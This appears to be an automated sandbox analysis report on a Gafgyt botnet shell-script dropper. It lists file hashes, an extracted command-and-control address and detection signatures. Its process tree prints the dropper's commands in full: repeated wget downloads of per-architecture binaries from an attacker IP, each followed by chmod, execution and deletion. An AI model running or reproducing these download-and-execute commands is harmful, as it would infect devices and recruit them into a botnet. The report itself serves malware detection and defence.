Analysis
-
max time kernel
27s -
max time network
24s -
platform
debian-9_mipsel -
resource
debian9-mipsel-20240226-en -
resource tags
arch:mipselimage:debian9-mipsel-20240226-enkernel:4.9.0-13-4kc-maltalocale:en-usos:debian-9-mipselsystem -
submitted
04-12-2024 02:17
Static task
static1
Behavioral task
behavioral1
Sample
2884954c3ee63cc245def342b3946b24b0aa2cbaebf7d6b2c5a8fd009760a469.sh
Resource
ubuntu1804-amd64-20240611-en
Behavioral task
behavioral2
Sample
2884954c3ee63cc245def342b3946b24b0aa2cbaebf7d6b2c5a8fd009760a469.sh
Resource
debian9-armhf-20240611-en
Behavioral task
behavioral3
Sample
2884954c3ee63cc245def342b3946b24b0aa2cbaebf7d6b2c5a8fd009760a469.sh
Resource
debian9-mipsbe-20240611-en
Behavioral task
behavioral4
Sample
2884954c3ee63cc245def342b3946b24b0aa2cbaebf7d6b2c5a8fd009760a469.sh
Resource
debian9-mipsel-20240226-en
General
-
Target
2884954c3ee63cc245def342b3946b24b0aa2cbaebf7d6b2c5a8fd009760a469.sh
-
Size
2KB
-
MD5
8ea1e7d08dd0cf52bbdddc3222e9b8af
-
SHA1
f031a227d961d83fc0083c4b5b7b4ccdfe64e711
-
SHA256
2884954c3ee63cc245def342b3946b24b0aa2cbaebf7d6b2c5a8fd009760a469
-
SHA512
1be9d8a04c9b95e9e07c6fad4ae90a160219b05d0bf4b77578ac7dee91b5f336688ac792aab88cc78b5923963e1c9bacf8c0407fc22119041e9def0f217800da
Malware Config
Extracted
gafgyt
192.3.179.33:23
Signatures
-
Detected Gafgyt variant 1 IoCs
resource yara_rule behavioral4/files/fstream-1.dat family_gafgyt -
Gafgyt family
-
File and Directory Permissions Modification 1 TTPs 13 IoCs
Adversaries may modify file or directory permissions to evade defenses.
pid Process 778 chmod 786 chmod 752 chmod 716 chmod 726 chmod 731 chmod 735 chmod 740 chmod 744 chmod 748 chmod 705 chmod 767 chmod 758 chmod -
Executes dropped EXE 1 IoCs
ioc pid Process /tmp/a-r.m-6.SNOOPY 736 a-r.m-6.SNOOPY -
Writes file to tmp directory 1 IoCs
Malware often drops required files in the /tmp directory.
description ioc Process File opened for modification /tmp/a-r.m-6.SNOOPY wget
Processes
-
/tmp/2884954c3ee63cc245def342b3946b24b0aa2cbaebf7d6b2c5a8fd009760a469.sh/tmp/2884954c3ee63cc245def342b3946b24b0aa2cbaebf7d6b2c5a8fd009760a469.sh1⤵PID:690
-
/usr/bin/wgetwget http://192.3.179.33/m-i.p-s.SNOOPY2⤵PID:693
-
-
/bin/chmodchmod +x m-i.p-s.SNOOPY2⤵
- File and Directory Permissions Modification
PID:705
-
-
/tmp/m-i.p-s.SNOOPY./m-i.p-s.SNOOPY2⤵PID:707
-
-
/bin/rmrm -rf m-i.p-s.SNOOPY2⤵PID:708
-
-
/usr/bin/wgetwget http://192.3.179.33/m-p.s-l.SNOOPY2⤵PID:711
-
-
/bin/chmodchmod +x m-p.s-l.SNOOPY2⤵
- File and Directory Permissions Modification
PID:716
-
-
/tmp/m-p.s-l.SNOOPY./m-p.s-l.SNOOPY2⤵PID:718
-
-
/bin/rmrm -rf m-p.s-l.SNOOPY2⤵PID:719
-
-
/usr/bin/wgetwget http://192.3.179.33/s-h.4-.SNOOPY2⤵PID:721
-
-
/bin/chmodchmod +x s-h.4-.SNOOPY2⤵
- File and Directory Permissions Modification
PID:726
-
-
/tmp/s-h.4-.SNOOPY./s-h.4-.SNOOPY2⤵PID:727
-
-
/bin/rmrm -rf s-h.4-.SNOOPY2⤵PID:728
-
-
/usr/bin/wgetwget http://192.3.179.33/x-8.6-.SNOOPY2⤵PID:729
-
-
/bin/chmodchmod +x x-8.6-.SNOOPY2⤵
- File and Directory Permissions Modification
PID:731
-
-
/tmp/x-8.6-.SNOOPY./x-8.6-.SNOOPY2⤵PID:732
-
-
/bin/rmrm -rf x-8.6-.SNOOPY2⤵PID:733
-
-
/usr/bin/wgetwget http://192.3.179.33/a-r.m-6.SNOOPY2⤵
- Writes file to tmp directory
PID:734
-
-
/bin/chmodchmod +x a-r.m-6.SNOOPY2⤵
- File and Directory Permissions Modification
PID:735
-
-
/tmp/a-r.m-6.SNOOPY./a-r.m-6.SNOOPY2⤵
- Executes dropped EXE
PID:736
-
-
/bin/rmrm -rf a-r.m-6.SNOOPY2⤵PID:738
-
-
/usr/bin/wgetwget http://192.3.179.33/x-3.2-.SNOOPY2⤵PID:739
-
-
/bin/chmodchmod +x x-3.2-.SNOOPY2⤵
- File and Directory Permissions Modification
PID:740
-
-
/tmp/x-3.2-.SNOOPY./x-3.2-.SNOOPY2⤵PID:741
-
-
/bin/rmrm -rf x-3.2-.SNOOPY2⤵PID:742
-
-
/usr/bin/wgetwget http://192.3.179.33/a-r.m-7.SNOOPY2⤵PID:743
-
-
/bin/chmodchmod +x a-r.m-7.SNOOPY2⤵
- File and Directory Permissions Modification
PID:744
-
-
/tmp/a-r.m-7.SNOOPY./a-r.m-7.SNOOPY2⤵PID:745
-
-
/bin/rmrm -rf a-r.m-7.SNOOPY2⤵PID:746
-
-
/usr/bin/wgetwget http://192.3.179.33/p-p.c-.SNOOPY2⤵PID:747
-
-
/bin/chmodchmod +x p-p.c-.SNOOPY2⤵
- File and Directory Permissions Modification
PID:748
-
-
/tmp/p-p.c-.SNOOPY./p-p.c-.SNOOPY2⤵PID:749
-
-
/bin/rmrm -rf p-p.c-.SNOOPY2⤵PID:750
-
-
/usr/bin/wgetwget http://192.3.179.33/i-5.8-6.SNOOPY2⤵PID:751
-
-
/bin/chmodchmod +x i-5.8-6.SNOOPY2⤵
- File and Directory Permissions Modification
PID:752
-
-
/tmp/i-5.8-6.SNOOPY./i-5.8-6.SNOOPY2⤵PID:753
-
-
/bin/rmrm -rf i-5.8-6.SNOOPY2⤵PID:754
-
-
/usr/bin/wgetwget http://192.3.179.33/m-6.8-k.SNOOPY2⤵PID:755
-
-
/bin/chmodchmod +x m-6.8-k.SNOOPY2⤵
- File and Directory Permissions Modification
PID:758
-
-
/tmp/m-6.8-k.SNOOPY./m-6.8-k.SNOOPY2⤵PID:759
-
-
/bin/rmrm -rf m-6.8-k.SNOOPY2⤵PID:761
-
-
/usr/bin/wgetwget http://192.3.179.33/p-p.c-.SNOOPY2⤵PID:762
-
-
/bin/chmodchmod +x p-p.c-.SNOOPY2⤵
- File and Directory Permissions Modification
PID:767
-
-
/tmp/p-p.c-.SNOOPY./p-p.c-.SNOOPY2⤵PID:769
-
-
/bin/rmrm -rf p-p.c-.SNOOPY2⤵PID:771
-
-
/usr/bin/wgetwget http://192.3.179.33/a-r.m-4.SNOOPY2⤵PID:772
-
-
/bin/chmodchmod +x a-r.m-4.SNOOPY2⤵
- File and Directory Permissions Modification
PID:778
-
-
/tmp/a-r.m-4.SNOOPY./a-r.m-4.SNOOPY2⤵PID:779
-
-
/bin/rmrm -rf a-r.m-4.SNOOPY2⤵PID:781
-
-
/usr/bin/wgetwget http://192.3.179.33/a-r.m-5.SNOOPY2⤵PID:782
-
-
/bin/chmodchmod +x a-r.m-5.SNOOPY2⤵
- File and Directory Permissions Modification
PID:786
-
-
/tmp/a-r.m-5.SNOOPY./a-r.m-5.SNOOPY2⤵PID:789
-
-
/bin/rmrm -rf a-r.m-5.SNOOPY2⤵PID:790
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
108KB
MD5d99e614a76b1b6b63030556a22cf2881
SHA11cc0cc981f07d648722bc0b112da2d697858558f
SHA2566bcf634cf08615de9c4f5759bcc2523b114db64a67ed3c119c7aa4230be0b0b5
SHA51219585dae9db8f913f809da6644127b064b03ec2156fe482b87feb803c8facb291da0b951336c7bc13cef6af1a032229f8f18511b09531a2ad3dce4f53bb8051f